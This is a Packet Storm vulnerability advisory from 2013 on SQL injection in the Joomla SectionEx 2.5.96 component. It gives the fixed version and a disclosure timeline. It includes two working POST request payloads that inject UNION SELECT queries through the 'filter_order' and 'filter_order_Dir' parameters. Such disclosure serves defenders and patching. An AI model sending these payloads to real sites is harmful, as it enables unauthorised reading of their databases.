Joomla SectionEx 2.5.96 SQL Injection

2013-08-05T00:00:00
ID PACKETSTORM:122681
Type packetstorm
Reporter Matias Fontanini
Modified 2013-08-05T00:00:00

Description

                                        
                                            `-------------------------------------------------------------------------------------  
Joomla com_sectionex v2.5.96 SQL Injection vulnerabilities  
-------------------------------------------------------------------------------------  
  
== Description ==  
- Software link: http://stackideas.com/sectionex  
- Affected versions: version 2.5.96 is vulnerable. Other versions  
might be affected as well.  
- Author: Matias Fontanini  
  
== Vulnerabilities ==  
When using the "category" view, the component does not correctly  
sanitize the "filter_order" and "filter_order_Dir" parameters before  
using them to construct SQL queries, making it vulnerable to SQL  
Injection attacks.  
  
In order to exploit these vulnerabilities, an attacker could perform  
requests like the following ones:  
  
- For the "filter_order" parameter:  
  
POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y  
  
filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1  
limit 1 offset 10000) union all (select  
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from  
dual)%23&filter_order_Dir=DESC  
  
- For the "filter_order_Dir" parameter:  
  
POST /index.php?option=com_sectionex&view=category&id=X&Itemid=Y  
  
filter_title=&filter_content=&limit=0&sectionid=20&filter_order=1&filter_order_Dir=DESC  
limit 1 offset 10000) union all (select  
1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16 from dual)%23  
  
== Solution ==  
Upgrade the product to the 2.5.104 version.  
  
== Report timeline ==  
[2013-07-30] Vulnerabilities reported to the developers.  
[2013-07-30] Developers answered back indicating that a new release  
would be made soon.  
[2013-08-01] SectionEx 2.5.104 was released, which fixed the issues reported.  
[2013-08-05] Public disclosure.  
`